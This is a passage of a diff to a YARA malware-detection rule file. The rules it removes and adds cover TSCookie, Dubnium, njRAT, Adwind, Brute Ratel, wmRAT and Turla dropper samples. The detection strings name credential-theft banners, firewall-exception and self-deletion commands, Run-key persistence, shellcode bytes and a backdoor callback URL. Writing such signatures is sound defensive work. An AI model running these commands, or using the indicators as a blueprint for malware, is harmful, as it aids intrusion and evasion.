+		$b = "ServerStarted" wide
+		$c = "XtremeKeylogger" wide
+		$d = "x.html" wide
+		$e = "Xtreme RAT" wide
 
 	condition:
-		all of ( $APIHashing32bit* ) or all of ( $APIHashing64bit* )
+		all of them
 }
-
-rule SIGNATURE_BASE_Tscookie_RAT : FILE
+rule SIGNATURE_BASE_RAT_Adwind
 {
 	meta:
-		description = "Detects TSCookie RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a2b6c598-4498-5c0a-9257-b0bf6cd28de9"
-		date = "2018-03-06"
+		description = "Detects Adwind RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "95681c07-0e9c-5688-a8a0-899617521c7b"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_tscookie_rat.yar#L13-L32"
+		reference = "http://malwareconfig.com/stats/adWind"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L992-L1011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c6121c541a77219b17351787973a4bc06a8d941ebd5f9e5e1e14ad4740a3fe7b"
+		logic_hash = "11167b927fa06324950753c6ec8f28058f2aa66fb4ecdf66a21de11a8db190b8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "[-] DecryptPassword_Outlook failed(err=%d)" fullword ascii
-		$x2 = "----------------------- Firefox Passwords ------------------" fullword ascii
-		$x3 = "--------------- Outlook Passwords ------------------" fullword ascii
-		$x4 = "----------------------- IE Passwords ------------------" fullword ascii
+		$meta = "META-INF"
+		$conf = "config.xml"
+		$a = "Adwind.class"
+		$b = "Principal.adwind"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( pe.exports ( "DoWork" ) and pe.exports ( "PrintF" ) ) or 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_1 : FILE
+rule SIGNATURE_BASE_RAT_Njrat
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "377ecbaa-9324-562e-a973-0276d44f3feb"
-		date = "2016-06-10"
+		description = "Detects njRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "6289b9c8-eef6-5cfb-97bd-b819158d6fdd"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L10-L24"
+		reference = "http://malwareconfig.com/stats/njRat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1013-L1036"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94763f42dacbeede9a72c3ecc222164a5808bd74c5d2d783c76831221a9c30c8"
+		logic_hash = "47e8cc71caaefd70a170eb8fc845cb7ddb8df04b90163fe35f1ccb9a3f614c57"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
-		$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
+		$s1 = {7C 00 27 00 7C 00 27 00 7C}
+		$s2 = "netsh firewall add allowedprogram" wide
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s4 = "yyyy-MM-dd" wide
+		$v1 = "cmd.exe /k ping 0 & del" wide
+		$v2 = "cmd.exe /c ping 127.0.0.1 & del" wide
+		$v3 = "cmd.exe /c ping 0 -n 2 & del" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of ( $s* ) and any of ( $v* )
 }
-rule SIGNATURE_BASE_Dubnium_Sample_2 : FILE
+rule SIGNATURE_BASE_RAT_Unrecom
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "894dc893-25fc-5fdc-9f69-8085b94e1af1"
-		date = "2016-06-10"
+		description = "Detects unrecom RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "56b11c22-f43c-5192-9a0a-0ac14b0cd041"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L26-L40"
+		reference = "http://malwareconfig.com/stats/unrecom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1038-L1058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b633a7e002609fa78b0de8fb818af1b47fbe77497d161b6b41602fb34780ca8"
+		logic_hash = "15ab9ee2f3fd825e91813a185bc5c7d7e790de39cd3e88c375b801d1412a08f4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = ":*:::D:\\:c:~:" fullword ascii
-		$s2 = "SPMUVR" fullword ascii
+		$meta = "META-INF"
+		$conf = "load/ID"
+		$a = "load/JarMain.class"
+		$b = "load/MANIFEST.MF"
+		$c = "plugins/UnrecomServer.class"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_3 : FILE
+rule SIGNATURE_BASE_MAL_JRAT_Oct18_1 : FILE
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
+		description = "Detects JRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "66f66139-88df-5ba9-a3fc-ba4fc98ce3f9"
-		date = "2016-06-10"
+		id = "f211ef1c-8def-55f0-8817-d01ebd9c2947"
+		date = "2018-10-11"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L42-L62"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1060-L1072"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "851efb71cd80040fdd13d9961d1e0084421c783afc43417ff1ac3ed023a73ae1"
+		logic_hash = "7c652f3943ae7639633b82663f639adb7dea1bae9e617a14710fb6e448cfdbee"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
-		hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
-		hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
+		hash1 = "ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411"
 
 	strings:
-		$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
-		$x2 = "del /f \"%s\" " fullword ascii
-		$s1 = "del /f /ah \"%s\" " fullword ascii
-		$s2 = "if exist \"%s\" goto Rept " fullword ascii
-		$s3 = "\\*.*.lnk" ascii
-		$s4 = "Dropped" fullword ascii
+		$x1 = "/JRat.class" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of them
+		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_5 : FILE
+
+rule SIGNATURE_BASE_Brc4_Shellcode
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "09c1aeee-9437-54e9-967f-3c2fcc0736ed"
-		date = "2016-06-10"
+		description = "Hunts for shellcode opcode used in Badger x86/x64 till release v1.2.9"
+		author = "@ninjaparanoid"
+		id = "7e899d2f-332b-53f7-b9e6-cfde2bce6223"
+		date = "2022-11-19"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L64-L87"
+		reference = "https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/brc4.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_bruteratel_c4.yar#L263-L290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f84f502ba9a4fe304851badfa98d9e8500cdef472d4358cfd327365ac04dda3"
+		logic_hash = "a2816eb0316cebc96569847c17eae3bc50b988b07aa471176a09695fcefc21ec"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
-		hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		quality = 83
+		tags = ""
+		version = "last version"
+		arch_context = "x64"
 
 	strings:
-		$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
-		$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
+		$shellcode_x64_Start = { 55 50 53 51 52 56 57 41 50 41 51 41 52 41 53 41 54 41 55 41 56 41 57 }
+		$shellcode_x64_End = { 5B 5E 5F 41 5C 41 5D 41 5E 41 5F 5D C3 }
+		$shellcode_x64_StageEnd = { 5C 41 5F 41 5E 41 5D 41 5C 41 5B 41 5A 41 59 41 58 5F 5E 5A 59 5B 58 5D C3 }
+		$funcHash1 = { 5B BC 4A 6A }
+		$funcHash2 = { 5D 68 FA 3C }
+		$funcHash3 = { AA FC 0D 7C }
+		$funcHash4 = { 8E 4E 0E EC }
+		$funcHash5 = { B8 12 DA 00 }
+		$funcHash6 = { 07 C4 4C E5 }
+		$funcHash7 = { BD CA 3B D3 }
+		$funcHash8 = { 89 4D 39 8C }
+		$hashFuncx64 = { EB 20 0F 1F 44 00 00 44 0F B6 C8 4C 89 DA 41 83 E9 20 4D 63 C1 4B 8D 04 10 49 39 CB 74 21 49 83 C3 01 41 89 C2 }
+		$hashFuncx86 = { EB 07 8D 74 26 00 83 C2 01 0F B6 31 C1 C8 0D 89 F1 8D 5C 30 E0 01 F0 80 F9 61 89 D1 0F 43 C3 39 D7 75 E3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		(pe.machine == pe.MACHINE_AMD64 and ( 2 of ( $shellcode* ) or all of ( $funcHash* ) and $hashFuncx64 ) ) or ( pe.machine == pe.MACHINE_I386 and ( all of ( $funcHash* ) and $hashFuncx86 ) )
 }
-rule SIGNATURE_BASE_Dubnium_Sample_6 : FILE
+rule SIGNATURE_BASE_APT_IN_TA397_Wmrat : HUNTING
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "43366f1a-784d-515e-a8e9-3e924f2abfd8"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L89-L107"
+		description = "track wmRAT based on socket usage, odd error handling, and reused strings"
+		author = "Proofpoint"
+		id = "c5855b30-3e75-570f-b327-498dfc382159"
+		date = "2024-11-20"
+		modified = "2025-01-17"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta397_dec24.yar#L2-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3425734b3259ebd5390cf16d2e394a4cc735dc3fc9fcc627b46bcc77729e465e"
+		hash = "3bf4bbd5564f4381820fb8da5810bd4d9718b5c80a7e8f055961007c6f30da2b"
+		hash = "3e9a08972b8ec9c2e64eeb46ce1db92ae3c40bc8de48d278ba4d436fc3c8b3a4"
+		hash = "40ddb4463be9d8131f363fd78e21d9de5d838a3ec4044526aea45a473d6ddd61"
+		hash = "4836cb7eed0b20da50acb26472f918b180917101c026ce36074e0e879b604308"
+		hash = "4e3e4d476810c95c34b6f2aa9c735f8e57e85e3b7a97c709adc5d6ee4a5f6ccc"
+		hash = "5ab76cf85ade810b7ae449e3dff8a19a018174ced45d37062c86568d9b7633f9"
+		hash = "811741d9df51a9f16272a64ec7eb8ff12f8f26794368b1ff4ad5d30a1f4bb42a"
+		hash = "b588a423b826b57dce72c9ab58f89be2ddc710a0367ed0eed001c047d8bef32a"
+		hash = "caf871247b7256945598816e9c5461d64b6bdb68a15ff9f8742ca31dc00865f8"
+		logic_hash = "b20a13b87f4b81e7ebc10ff2f6203aeab46980e0d481bad786695339dd59bf7a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		tags = "HUNTING"
+		category = "hunting"
+		malfamily = "wmRAT"
+		version = "1.0"
 
 	strings:
-		$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
-		$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
-		$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
+		$code_sleep_loop = {
+            6a 64              // push    0x64
+            ff d6              // call    esi
+            6a 01              // push    0x1
+            e8 ?? ?? ?? ??     // call    operator new
+            83 c4 04           // add     esp, 0x4
+            3b c7              // cmp     eax, edi
+
+        }
+		$code_error_handling = {
+            88 19           // mov     byte [ecx], bl
+            4a              // dec     edx
+            41              // inc     ecx
+            47              // inc     edi
+            4e              // dec     esi
+            85 d2           // test    edx, edx
+            ?? ??           // jne     0x401070
+            5f              // pop     edi {__saved_edi}
+            49              // dec     ecx
+            5e              // pop     esi {__saved_esi}
+            b8 7a 00 07 80  // mov     eax, 0x8007007a
+
+        }
+		$code_socket_recv_parsing = {
+            // 8b 15 20 55 41 00   mov     edx, dword [data_415520]
+            6a 00              // push    0x0
+            b8 04 00 00 00     // mov     eax, 0x4
+            2b c6              // sub     eax, esi
+            50                 // push    eax {var_10_1}
+            8d 0c 3e           // lea     ecx, [esi+edi]
+            51                 // push    ecx {var_14_1}
+            52                 // push    edx {var_18_1}
+            ff ??              // call    ebx
+            83 f8 ff           // cmp     eax, 0xffffffff
+            ?? ??              // je      0x4082e3
+            03 f0              // add     esi, eax
+            83 fe 04           // cmp     esi, 0x4
+          }
+		$str1 = "-.-.-." ascii
+		$str2 = "PATH" ascii
+		$str3 = "Path=" ascii
+		$str4 = "https://microsoft.com" ascii
+		$str5 = "%s%ld M" ascii
+		$str6 = "%s%ld K" ascii
+		$str7 = "%s(%ld)" ascii
+		$str8 = "RFOX" ascii
+		$str9 = "1llll" ascii
+		$str10 = "%d result(s)" ascii
+		$str11 = "%s%ld MB" ascii
+		$str12 = "%s%ld KB" ascii
+		$str13 = "%.1f" ascii
+		$str14 = "%02d-%02d-%d %02d:%02d" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		uint16be( 0x0 ) == 0x4d5a and ( 2 of ( $code* ) or 10 of ( $str* ) )
 }
-rule SIGNATURE_BASE_Dubnium_Sample_7 : FILE
+rule SIGNATURE_BASE_SUSP_RAR_NTFS_ADS : HUNTING FILE
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6712bd5f-6bbc-5ca0-9fc7-b2013b8f8147"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L109-L131"
+		description = "Detects RAR archive with NTFS alternate data stream"
+		author = "Proofpoint"
+		id = "ca2b5904-b3d3-53cd-a973-6f30f0831a94"
+		date = "2024-12-17"
+		modified = "2025-01-17"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta397_dec24.yar#L82-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76cf4acee025fcae1dec975a124f4bf808f1f09f99f7fa6a4e965febd6a89e3a"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		logic_hash = "bcca4771e8f940ce8cfcff08284545fec6163df549e1fb589d89ca3fa335f04c"
+		score = 70
+		quality = 83
+		tags = "HUNTING, FILE"
+		category = "hunting"
+		hash1 = "feec47858379c29300d249d1693f68dc085300f493891d1a9d4ea83b8db6e3c3"
+		hash2 = "53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1"
 
 	strings:
-		$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
-		$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
+		$rar_magic = {52 61 72 21}
+		$ads = {
+                 03         // Header Type -> Service Header
+                 23         // Header flags
+                 [17-20]    // Flags and extra data area
+                 00         // Windows
+                 03         // Length of name = STM = 3
+                 53 54 4d   // STM NTFS alternate data stream
+                 [1-2]      // variable int (vint) for size of the stream name -> 1-2 bytes should be enough to take into account
+                 07         // Data type = Service data = Service header data array
+                 3a         // Start of the ADS name -> start with colon ":"
+               }
+		$neg = "Zone.Identifier"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		$rar_magic at 0 and $ads and not $neg in ( @ads [ 1 ] .. @ads [ 1 ] + 15 )
 }
-rule SIGNATURE_BASE_Dubnium_Sample_Sshopenssl : FILE
+rule SIGNATURE_BASE_Turla_Png_Dropper : FILE
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d4f2b494-47b6-5b8e-b358-30159dfb977b"
-		date = "2016-06-10"
+		description = "Detects the PNG Dropper used by the Turla group"
+		author = "Ben Humphrey"
+		id = "459f17c8-0eae-5736-8c7c-286625dc158f"
+		date = "2018-11-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L133-L152"
+		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_png_dropper_nov18.yar#L3-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cad6b0785e8c9627f1b9678dc6206cf36cd33ead2283f77655fdb0ea36249e9"
+		logic_hash = "c859310660603d0748cf17daea0799af7684f2a9f77f729871eb57338fbfcca6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		hash1 = "6ed939f59476fd31dc4d99e96136e928fbd88aec0d9c59846092c0e93a3c0e27"
 
 	strings:
-		$s1 = "sshkeypairgen.exe" fullword wide
-		$s2 = "OpenSSL: FATAL" fullword ascii
+		$api0 = "GdiplusStartup"
+		$api1 = "GdipAlloc"
+		$api2 = "GdipCreateBitmapFromStreamICM"
+		$api3 = "GdipBitmapLockBits"
+		$api4 = "GdipGetImageWidth"
+		$api5 = "GdipGetImageHeight"
+		$api6 = "GdiplusShutdown"
+		$code32 = {
+            8B 46 3C               // mov     eax, [esi+3Ch]
+            B9 0B 01 00 00         // mov     ecx, 10Bh
+            66 39 4C 30 18         // cmp     [eax+esi+18h], cx
+            8B 44 30 28            // mov     eax, [eax+esi+28h]
+            6A 00                  // push    0
+            B9 AF BE AD DE         // mov     ecx, 0DEADBEAFh
+            51                     // push    ecx
+            51                     // push    ecx
+            03 C6                  // add     eax, esi
+            56                     // push    esi
+            FF D0                  // call eax
+        }
+		$code64 = {
+            48 63 43 3C            // movsxd rax, dword ptr [rbx+3Ch]
+            B9 0B 01 00 00         // mov ecx, 10Bh
+            BA AF BE AD DE         // mov edx, 0DEADBEAFh
+            66 39 4C 18 18         // cmp [rax+rbx+18h], cx
+            8B 44 18 28            // mov eax, [rax+rbx+28h]
+            45 33 C9               // xor r9d, r9d
+            44 8B C2               // mov r8d, edx
+            48 8B CB               // mov rcx, rbx
+            48 03 C3               // add rax, rbx
+            FF D0                  // call rax
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of ( $api* ) and 1 of ( $code* )
 }
-rule SIGNATURE_BASE_MAL_Passwordstate_Moserware_Backdoor_Apr21_1 : FILE
+
+rule SIGNATURE_BASE_Turla_Png_Reg_Enum_Payload : FILE
 {
 	meta:
-		description = "Detects backdoor used in Passwordstate incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "061de3ae-c404-5e4a-a16b-b3b208b1ae7f"
-		date = "2021-04-25"
+		description = "Payload that has most recently been dropped by the Turla PNG Dropper"
+		author = "Ben Humphrey"
+		id = "413bb315-3c01-56ab-92db-00342a11438a"
+		date = "2018-11-23"
 		modified = "2023-12-05"
-		reference = "https://thehackernews.com/2021/04/passwordstate-password-manager-update.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_passwordstate_backdoor.yar#L1-L24"
+		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_png_dropper_nov18.yar#L51-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46bf5b7f4f75997535742021d1d5c2129daae0b3836c08383058e5e5b8e27d93"
+		logic_hash = "b01d0c3a26ce955570ed5607514906bd8860f36637957e39a15f74a7dbb1a1e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c2169ab4a39220d21709964d57e2eafe4b68c115061cbb64507cfbbddbe635c6"
-		hash2 = "f23f9c2aaf94147b2c5d4b39b56514cd67102d3293bdef85101e2c05ee1c3bf9"
+		hash1 = "fea27eb2e939e930c8617dcf64366d1649988f30555f6ee9cd09fe54e4bc22b3"
 
 	strings:
-		$x1 = "https://passwordstate-18ed2.kxcdn.com" wide
-		$s1 = " ProxyUserName, ProxyPassword FROM [SystemSettings]" wide fullword
-		$s2 = "PasswordstateService.Passwordstate.Crypto" wide
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari" wide fullword
-		$op1 = { 00 4c 00 4e 00 43 00 4c 00 49 00 31 00 31 00 3b 00 00 17 }
-		$op2 = { 4c 00 49 00 31 00 31 00 3b 00 00 17 50 00 72 00 }
-		$op3 = { 61 00 74 00 65 00 2d 00 31 00 38 00 65 00 64 00 32 00 2e 00 6b 00 78 00 }
+		$crypt00 = "Microsoft Software Key Storage Provider" wide
+		$crypt01 = "ChainingModeCBC" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and pe.imports ( "advapi32.dll" , "StartServiceCtrlDispatcherA" ) and pe.imports ( "advapi32.dll" , "RegEnumValueA" ) and pe.imports ( "advapi32.dll" , "RegEnumKeyExA" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenStorageProvider" ) and pe.imports ( "ncrypt.dll" , "NCryptEnumKeys" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenKey" ) and pe.imports ( "ncrypt.dll" , "NCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptGenerateSymmetricKey" ) and pe.imports ( "ncrypt.dll" , "BCryptGetProperty" ) and pe.imports ( "ncrypt.dll" , "BCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptEncrypt" ) and all of them
 }
-rule SIGNATURE_BASE_Badrabbit_Gen : FILE
